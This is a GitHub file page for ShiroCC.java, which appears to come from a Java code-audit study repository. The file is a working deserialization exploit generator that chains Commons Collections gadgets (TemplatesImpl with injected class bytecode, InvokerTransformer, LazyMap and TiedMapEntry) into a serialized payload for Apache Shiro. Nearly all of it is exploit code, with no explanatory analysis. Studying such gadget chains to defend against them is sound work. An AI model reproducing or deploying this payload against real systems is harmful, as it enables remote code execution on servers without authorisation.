FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
Java_Code_Audit/Shiroexp/src/main/java/ShiroCC.java at master · apsry/Java_Code_Audit · GitHub
apsry
Java_Code_Audit
Repository navigation
Code
Issues
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
Java_Code_Audit
/
Shiroexp
/
src
/
main
/
java
/
ShiroCC.java
Copy path
More file actions
More file actions
Latest commit
History
History
History
65 lines (56 loc) · 2.43 KB
Breadcrumbs
Java_Code_Audit
/
Shiroexp
/
src
/
main
/
java
/
ShiroCC.java
Copy path
File metadata and controls
65 lines (56 loc) · 2.43 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
import
com
.
sun
.
org
.
apache
.
xalan
.
internal
.
xsltc
.
trax
.
TemplatesImpl
;
import
org
.
apache
.
commons
.
collections
.
functors
.
ConstantTransformer
;
import
org
.
apache
.
commons
.
collections
.
keyvalue
.
TiedMapEntry
;
import
org
.
apache
.
commons
.
collections
.
map
.
LazyMap
;
import
org
.
apache
.
commons
.
collections
.
functors
.
InvokerTransformer
;
import
java
.
io
.*;
import
java
.
lang
.
reflect
.
Field
;
import
java
.
nio
.
file
.
Files
;
import
java
.
nio
.
file
.
Paths
;
import
java
.
util
.
HashMap
;
import
java
.
util
.
Map
;
public
class
ShiroCC
{
public
static
void
main
(
String
[]
args
)
throws
Exception
{
//cc3
TemplatesImpl
templates
=
new
TemplatesImpl
();
Class
tc
=
templates
.
getClass
();
Field
nameField
=
tc
.
getDeclaredField
(
"_name"
);
nameField
.
setAccessible
(
true
);
nameField
.
set
(
templates
,
"aaa"
);
Field
bytecodeField
=
tc
.
getDeclaredField
(
"_bytecodes"
);
bytecodeField
.
setAccessible
(
true
);
byte
[]
code
=
Files
.
readAllBytes
(
Paths
.
get
(
"C:
\\
Users
\\
17140
\\
Desktop
\\
暑假实习
\\
java代码审计
\\
Cc1_test
\\
target
\\
classes
\\
Test.class"
));
byte
[][]
codes
= {
code
};
bytecodeField
.
set
(
templates
,
codes
);
//cc2
InvokerTransformer
invokerTransformer
=
new
InvokerTransformer
(
"newTransformer"
,
null
,
null
);
//cc6
HashMap
<
Object
,
Object
>
map
=
new
HashMap
<>();
Map
<
Object
,
Object
>
lazyMap
=
LazyMap
.
decorate
(
map
,
new
ConstantTransformer
(
1
));
TiedMapEntry
tiedMapEntry
=
new
TiedMapEntry
(
lazyMap
,
templates
);
HashMap
<
Object
,
Object
>
map2
=
new
HashMap
<>();
map2
.
put
(
tiedMapEntry
,
"bbb"
);
lazyMap
.
remove
(
templates
);
Class
c
=
LazyMap
.
class
;
Field
factoryField
=
c
.
getDeclaredField
(
"factory"
);
factoryField
.
setAccessible
(
true
);
factoryField
.
set
(
lazyMap
,
invokerTransformer
);
serialize
(
map2
);
//unserialize("ser.bin");
}
public
static
void
serialize
(
Object
obj
)
throws
IOException
{
ObjectOutputStream
oos
=
new
ObjectOutputStream
(
new
FileOutputStream
(
"ser.bin"
));
oos
.
writeObject
(
obj
);
/*
写对象,序列化
*/
}
public
static
Object
unserialize
(
String
Filename
)
throws
IOException
,
ClassNotFoundException
{
ObjectInputStream
ois
=
new
ObjectInputStream
(
new
FileInputStream
(
Filename
));
Object
obj
=
ois
.
readObject
();
/*
读对象,反序列化
*/
return
obj
;
}
}
Back
|
FazBrowse Home
|
New Git URL